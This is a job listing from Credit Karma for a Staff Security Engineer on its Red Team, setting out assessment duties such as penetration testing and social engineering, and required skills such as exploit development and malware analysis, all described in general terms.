Staff Security Engineer - Red Team

  • Credit Karma
  • San Francisco, CA, USA
  • Mar 25, 2022
Full time Developer JAVA Security

Job Description

Security is a core value at Credit Karma. We help millions of people better manage their credit. Safeguarding their sensitive information is critical to our continued success. From the CEO down to each individual developer, everyone views security as a personal responsibility. The successful candidate should understand basic concepts such as networking, applications, and operating system functionality and be able to learn advanced concepts such as application manipulation, exploit development, and stealthy operations. Your unique mission as a Red Team Staff Engineer is to identify potential weaknesses in the foundational infrastructure and core application and strategically reinforce them, enabling the engineering team to focus fiercely on new features. The assessments will drive the company’s ability to protect, detect and respond to cyber-attacks.

What You'll Do

  • Lead and deliver the red team assessments.
  • Perform network penetration, web and mobile application testing, source code reviews, threat analysis, wireless network assessments, and social-engineering assessments.
  • Assist with scoping prospective engagements, leading engagements from kickoff through remediation, and mentoring less experienced staff.
  • Execute controlled assessments, conduct attack/vulnerability research, work to evade detection mechanisms in place and address weaknesses through strategic partnerships around the organization.
  • Represent a contrarian perspective of security strategies, controls and defenses in order to identify previously undetected gaps or weaknesses.
  • Utilize techniques that probe and circumvent technical and operational controls to successfully demonstrate a compromise and how acts of deliberate disruption can cause adverse financial loss or bring about appreciable negative impact to Credit Karma and its members, partners and other stakeholders.
  • Support vulnerability remediation by recommending holistic solutions instead of brittle point-fixes.
  • Refactor existing codebase to leverage new security framework capabilities with an eye toward transition from monolithic to service-oriented architecture.
  • Understand and deploy security standards at an organizational scale (e.g. CSP, SRI, etc).

What We Expect

  • Minimum 8 years security experience, both as a builder and breaker in following: Mobile and web application assessments; Network penetration testing and manipulation of network infrastructure; Email, phone, or physical social-engineering assessments; Developing, extending, or modifying exploits, shellcode or exploit tools; Reverse engineering malware, data obfuscators, or ciphers; Cloud security and security architecture, GCP security controls.
  • Experience delivering reports and presenting findings, specifically to technical IT and management.
  • Technical depth in many, if not most of the following areas: LAMP stack, Node.js, Scala/Java, mobile, PKI, HTTP-based SOA/microservices, encryption, hashing, tokenization, secure randomness, Hardware Security Modules (HSMs), canonicalization, output encoding, message-based security, rate-limiting, anti-automation, role-based access control (RBAC), and large-scale data transport.
  • Working knowledge of all vulnerability classes on the OWASP Periodic Table of Vulnerabilities, with strong conceptualization of designs that make it impossible for developers to introduce those vulnerabilities.
  • Thorough understanding of InfoSec control frameworks and how they can be realistically implemented.
  • Source code review for control flow and security flaws
  • Thought leadership in the security field, with demonstrable contributions to industry groups.
  • Artful communication skills and organizational savvy to steer peers and leadership toward solutions that carefully balance business, risk, compliance, and engineering concerns.